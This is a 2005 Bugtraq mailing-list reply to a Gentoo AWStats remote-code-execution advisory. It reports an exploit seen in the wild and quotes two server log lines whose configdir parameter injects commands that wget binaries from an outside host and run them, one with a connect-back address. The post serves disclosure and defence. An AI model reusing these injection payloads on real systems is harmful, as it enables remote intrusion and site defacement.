Re: [ GLSA 200501-36 ] AWStats: Remote code execution

To: bugtraq@xxxxxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxx, security-alerts@xxxxxxxxxxxxxxxxx
Subject: Re: [ GLSA 200501-36 ] AWStats: Remote code execution
From: Delian Krustev <krustev@xxxxxxxxxxx>
Date: Wed, 26 Jan 2005 20:31:51 +0200
In-reply-to: <20050125201313.GA8733@xxxxxxxxxxxxxxxxxxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
References: <20050125201313.GA8733@xxxxxxxxxxxxxxxxxxxxxxxxxxxx>
User-agent: KMail/1.4.3

There's an exploit in the wild. Here's what it does:

200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET 
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00
 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET 
/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00
 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

I don't have the time to investigate the "cgi" and "dc" binaries.
The "cgi" at least tries to daemonize and opens a TCP listening socket.
They also try to replace the index page on the vulnerable site.

References:
- [ GLSA 200501-36 ] AWStats: Remote code execution
  - From: Luke Macken

Prev by Date: [SECURITY] [DSA 660-1] New kdebase packages fix authentication bypass
Next by Date: iDEFENSE Security Advisory 01.26.05: Openswan XAUTH/PAM Buffer Overflow Vulnerability
Previous by thread: [ GLSA 200501-36 ] AWStats: Remote code execution
Next by thread: wifi AP + broadcoast ping
Index(es):
- Date
- Thread